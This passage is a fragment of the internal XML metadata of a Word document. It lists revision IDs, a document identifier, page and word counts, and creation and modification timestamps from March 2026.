    <w:rsid w:val="00D97CF8"/>
    <w:rsid w:val="00E965EF"/>
    <w:rsid w:val="00EF1651"/>
    <w:rsid w:val="00F67866"/>
    <w:rsid w:val="00F95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B244A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BDAD11B1-C98F-4E87-A214-90B7AF99E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4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4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4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4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4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4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4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4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4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4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4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4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44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44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44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44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44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44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4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4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4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4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4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44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44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44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4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44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4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667</TotalTime>
  <Pages>1</Pages>
  <Words>1252</Words>
  <Characters>6890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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-17T12:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-19T13:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>